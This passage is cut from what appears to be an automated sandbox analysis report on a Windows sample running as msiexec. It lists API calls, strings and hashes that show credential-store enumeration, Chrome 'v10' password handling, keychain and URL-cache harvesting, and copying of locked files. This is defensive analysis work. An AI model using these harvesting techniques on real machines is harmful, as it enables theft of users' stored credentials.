  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2263259095-3798722523
• Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                                        • API String ID: 2744995895-28296030
                                                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040B71C
                                                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • memset.MSVCRT ref: 0040B756
                                                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                        • memset.MSVCRT ref: 0040B851
                                                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • memset.MSVCRT ref: 0040BB53
                                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                        • String ID: chp$v10
                                                                                                        • API String ID: 4290143792-2783969131
                                                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                        Control-flow Graph

                                                                                                        • Control-flow graph (image in the original report; legend: Executed / Not Executed). Function at 0040E2AB, basic blocks 40e2ab to 40e4af; internal calls 40695d, 406b90, 4069a3, 406e8f, 406b53, 40dd50, 40aa29, 40aa04, 40742e; CRT calls memset, free, wcschr, memcpy.
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                        • free.MSVCRT ref: 0040E49A
                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • memset.MSVCRT ref: 0040E380
                                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                        • API String ID: 3849927982-2252543386
                                                                                                        • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                        • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                        Control-flow Graph

                                                                                                        • Control-flow graph (image in the original report; legend: Executed / Not Executed). Function at 004091B8, basic blocks 4091b8 to 409526; internal calls 40a6e6, 444432, 40b273, 438552, 4251c4, 424f26, 4253cf, 4253af, 443d90, 408f2f; CRT calls memset, memcpy, memcmp.
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004091E2
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3715365532-3916222277
                                                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                        • String ID: bhv
                                                                                                        • API String ID: 4234240956-2689659898
                                                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                        Control-flow Graph

                                                                                                        • Control-flow graph (image in the original report; legend: Executed / Not Executed). Function at 00413F4F, basic blocks 413f4f to 413fa5; internal call 40a804, then five GetProcAddress calls.
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 2941347001-70141382
                                                                                                        • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                        • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                        Control-flow Graph

                                                                                                         Rendered graph not reproduced (the executed/not-executed colouring is not recoverable from the text). Basic blocks and the calls they make: 4466f4-44670e GetModuleHandleA; 44675b-4467aa __set_app_type, __p__fmode, __p__commode, call 4153f2; 4467ac-4467b7 __setusermatherr; 4467b8-44680e call 4468f0, _initterm, __wgetmainargs, _initterm; 446853-446864 GetStartupInfoW; 44687c-446894 GetModuleHandleA, call 41276d; 446896-446897 exit; 44689d-4468d6 _cexit; 4468d8-4468dd call 44693d (final block). The remaining blocks (446710-446758, 446810-44687b) contain no calls.
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2827331108-0
                                                                                                        • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                        • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C298
                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                        • String ID: visited:
                                                                                                        • API String ID: 1157525455-1702587658
                                                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                        Control-flow Graph

                                                                                                         Rendered graph not reproduced (the executed/not-executed colouring is not recoverable from the text). Basic blocks and the calls they make: 40e175-40e1a1 call 40695d, call 406b90; 40e1a7-40e1e5 memset; 40e1e8-40e1fa call 406e8f (loop head, re-entered from 40e270-40e27d); 40e1fc-40e219 call 40dd50 twice; 40e21f-40e235 call 40742e; 40e237-40e242 call 40aae3; 40e244-40e26b _snwprintf, call 40a8d0; 40e270-40e27d call 406b53 (loops back to 40e1e8 or leaves the loop at 40e283-40e286); 40e288-40e290 free; 40e291-40e294 call 40aa04; 40e299-40e2a8 call 4069a3 (final block).
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                        • free.MSVCRT ref: 0040E28B
                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                        • API String ID: 2804212203-2982631422
                                                                                                        • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                        • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
